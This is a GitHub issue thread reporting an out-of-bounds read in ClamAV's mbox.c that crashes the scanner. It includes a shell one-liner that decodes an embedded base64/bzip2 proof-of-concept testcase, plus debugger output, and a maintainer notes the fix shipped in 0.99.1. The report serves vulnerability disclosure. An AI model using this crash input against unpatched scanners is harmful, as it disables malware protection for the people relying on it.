### ISSUE TITLE
mbox.c:727 OOB read DoS

### ISSUE THREAD

**Issue by felixgr** [vrtadmin/clamav-devel#36]
``` 727 →       →       →       →       if(fullline[fulllinelength - 2] == ';')```

In the following example fulllinelength is pointing out-of-bounds of fullline:

```echo QlpoOTFBWSZTWch8U74AAZ3f0IAQQEIAGAsABAAvo5wAQAAAAggAIACJBSqIDQANNNApVQAAB6nqGD8xenmhM6E0cKEyoTeyoTjobSJihPlCb2CJkia6ExQmx4oTNCYImWtmhObNtoTso0YFVjp0EmrV7fxdyRThQkMh8U74 | base64 -d | bunzip2 -c > testcase```

**Comment by felixgr** [comment]
```>>> p fulllinelength
$1 = 2000
>>> p fullline
$2 = 0x61900001a980 "Content-Transfer-Encodingnsfer-Encoding"```

**Comment by steve-morgan** [comment]
Tracking with https://bugzilla.clamav.net/show_bug.cgi?id=11443

**Comment by felixgr** [comment]
Was there any progress? Can you add groebert at google.com to the ACL of the bugzilla bug?

**Comment by steve-morgan** [comment]
The fix for this issue shipped with ClamAV 0.99.1.
